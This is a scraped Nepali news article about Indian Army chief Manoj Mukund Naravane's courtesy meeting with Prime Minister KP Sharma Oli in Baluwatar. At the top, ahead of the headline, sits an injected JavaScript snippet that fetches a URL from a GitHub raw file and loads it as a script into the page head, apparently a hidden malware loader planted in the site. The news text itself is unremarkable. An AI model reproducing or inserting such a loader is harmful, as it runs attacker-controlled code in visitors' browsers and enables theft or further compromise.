;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); प्रधानमन्त्री ओली र भारतीय सेनाध्यक्ष नरवणेबिच भेटवार्ता [फोटोफिचर] – जुनेली न्युज
आइतवार, बैशाख ८, २०८२
  • होमपेज
  • प्रधानमन्त्री ओली र भारतीय सेनाध्यक्ष नरवणेबिच भेटवार्ता [फोटोफिचर]
राजनीति

प्रधानमन्त्री ओली र भारतीय सेनाध्यक्ष नरवणेबिच भेटवार्ता [फोटोफिचर]

कात्तिक २१,

काठमाडौं । भारतीय सेनाध्यक्ष मनोज मुकुन्द नरवणेले प्रधानमन्त्री केपी शर्मा ओलीसँग शिष्टाचार भेट गरेका छन् । 

शुक्रबार नरवाणेले ओलीसंग प्रधानमन्त्रीको सरकारी निवास बालुवाटारमा भेटवार्ता गरेको प्रधानमन्त्रीका प्रेस सल्लाहकार सुर्य थापाले जनाकारी दिए । भेटवार्ता कार्यक्रम जारी छ ।

उनी नेपाली सेनाको निमन्त्रणामा गत भुधबार नेपाल आएका थिए । उनी नेपाली सेनाको महानर्थी महारीको दर्जा चिन्न लिन आएका थिए उनलाई राष्ट्रपती विध्यादेवी भण्डारीले दर्जा प्रदान गरेकी छन् ।

उनी शुक्रबार बिहान माउनटेनको अवलोकन गर्न सोलुखुम्बु गएका थिए । उनले सगरमाथा हिमालको अबलोकन गरेका छन् ।

उनी आजै शुक्रबार स्वादेश फर्कने छन् ।

 

फेसबुक प्रतिक्रियाहरु